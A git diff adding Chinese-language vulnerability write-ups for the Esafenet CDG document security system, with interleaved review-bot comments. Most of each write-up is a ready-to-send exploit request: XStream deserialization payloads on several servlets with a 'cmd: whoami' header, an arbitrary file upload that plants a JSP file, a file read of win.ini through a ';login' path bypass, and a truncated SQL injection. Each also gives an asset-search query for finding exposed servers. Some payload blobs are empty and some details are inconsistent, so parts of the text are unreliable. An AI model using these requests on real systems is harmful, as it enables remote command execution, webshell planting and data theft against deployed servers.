FFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKH
JIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606528048-8db70095-33a1-4941-94a8-a0d512f0b4a5.png](./img/QzrzLUujmmYPkzrW/1706606528048-8db70095-33a1-4941-94a8-a0d512f0b4a5-577917.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xrwugqxrk5g7r02e> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UpdatePasswordService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpdatePasswordService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..75d6618 --- /dev/null 
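Review bot: this file is a copy of the UninstallApplicationService1 write-up with only the request path changed; the headers, `cmd: whoami`, `Content-Length: 14756` and the payload blob are identical, which indicates that these servlets share one XStream sink rather than having separate bugs. Keep a single write-up that lists every affected path (`/CDGServer3/UninstallApplicationService1`, `/CDGServer3/UpdateClientStatus`, `/CDGServer3/UpdatePasswordService`) instead of duplicating the 14 KB blob per endpoint; duplicated copies drift, and the `xstream 反序列化` spacing in this title already differs from the filename.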
+++ b/亿赛通电子文档安全管理系统UpdatePasswordService存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统UpdatePasswordService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统UpdatePasswordService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/uoP4yQeuB8LIwH0S/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-204601.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/UpdatePasswordService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBE
LCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606127067-5ca612a6-89c4-49ce-9b8e-8a9d8ea6453d.png](./img/uoP4yQeuB8LIwH0S/1706606127067-5ca612a6-89c4-49ce-9b8e-8a9d8ea6453d-031748.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/snk1s63y86e5ciig> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UpgradeService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpgradeService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..c899510 --- /dev/null 
+++ b/亿赛通电子文档安全管理系统UpgradeService1存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统UpgradeService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统UpgradeService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/sdMScspjjjqriDzh/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-945704.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/UpgradeService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJD
ENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706605450577-fee88eb3-9b29-44f0-875e-f77a2d5e47fb.png](./img/sdMScspjjjqriDzh/1706605450577-fee88eb3-9b29-44f0-875e-f77a2d5e47fb-318399.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ig36qq281gfbonwm> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UpgradeService2存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpgradeService2存在xstream反序列化漏洞.md new file mode 100644 index 0000000..0dedf62 --- /dev/null 
+++ b/亿赛通电子文档安全管理系统UpgradeService2存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统UpgradeService2存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统UpgradeService2存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/WvmVMAPZqfXIaEL3/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-683030.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/UpgradeService2 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +``` + +![1706605516246-95de2d9f-57ab-4aa2-b617-e939126fba12.png](./img/WvmVMAPZqfXIaEL3/1706605516246-95de2d9f-57ab-4aa2-b617-e939126fba12-934316.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wf0vz0u73yglcsc8> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞.md b/亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞.md new file mode 100644 index 0000000..ec5da60 --- /dev/null 
+++ b/亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞.md 
@@ -0,0 +1,45 @@ +# 亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/ZyqQDZT3JG_934By/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-467164.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Connection: close +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=22C9717F219D60381079FEBCDC6F635A +Content-Length: 9 + +014435897 +``` + +![1694274433318-8bf201e7-b8c9-4cc7-be8f-d29984fa0503.png](./img/ZyqQDZT3JG_934By/1694274433318-8bf201e7-b8c9-4cc7-be8f-d29984fa0503-721543.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/tttT.jsp +``` + +![1694274467839-bff7fb92-08d6-492d-92e5-ba54022d7c57.png](./img/ZyqQDZT3JG_934By/1694274467839-bff7fb92-08d6-492d-92e5-ba54022d7c57-498447.png) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gny15irlsb3oielm> \ No newline at end of file 
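Review bot: in the UploadFileFromClientServiceForClient hunk, the `Accept:` header line inside the ```plain fence reads `\*/\*;q=0.8`; backslashes are literal inside a fenced block, so the request as documented carries `\*/\*`, which is not a valid media range and is evidently a markdown-escaping artifact from the export; it should read `*/*;q=0.8`. The same hunk lists only the product name under 影响版本 with no affected or fixed version and no vendor advisory reference, which leaves defenders unable to tell which builds need attention, and the `Cookie: JSESSIONID=...` value looks like a real captured session id rather than a placeholder.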
diff --git a/亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream反序列化漏洞.md new file mode 100644 index 0000000..802954b --- /dev/null +++ b/亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/KGL3mR9YEaSpWhzU/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-080780.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/document/UploadFileListServiceForClient HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +``` + +![1706604868646-5a3eeaa1-3530-48cf-955b-586f5e31be9e.png](./img/KGL3mR9YEaSpWhzU/1706604868646-5a3eeaa1-3530-48cf-955b-586f5e31be9e-408318.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nbipys3d7t0rqvll> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞.md new file mode 100644 index 0000000..f1412ed 
--- /dev/null +++ b/亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞.md @@ -0,0 +1,33 @@ +# 亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/gTPPxS2vifJaCH5h/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-186959.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/document/UploadFileList;login HTTP/1.1 +Host: 192.168.31.24:8090 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 + +command=VeiwUploadFile&filePath=c:/windows/win.ini&fileName1=111 +``` + +![1705158772761-6334b83c-aa6c-4678-8f4e-021bb46bcad6.png](./img/gTPPxS2vifJaCH5h/1705158772761-6334b83c-aa6c-4678-8f4e-021bb46bcad6-389179.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kou7glcr9d0x2ty8> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞.md new file mode 100644 index 0000000..aee1f84 --- /dev/null +++ b/亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞.md 
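Review bot: the UploadFileList reproduction request is internally inconsistent and should be corrected before anyone relies on it: `Content-Length: 68` does not match the 64-byte body `command=VeiwUploadFile&filePath=c:/windows/win.ini&fileName1=111`, and the command is spelled `VeiwUploadFile` here while the ViewUploadFile write-up in this same commit uses `ViewUploadFile`; confirm which spelling the endpoint actually accepts and state it. The detection-relevant detail worth spelling out is that the path carries a `;login` path parameter (`/CDGServer3/document/UploadFileList;login`), so WAF or access-log rules keyed on the bare servlet path will miss it unless they normalise path parameters first.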
@@ -0,0 +1,55 @@ +# 亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/y6kVJz2P66ut0NRz/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-025518.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: 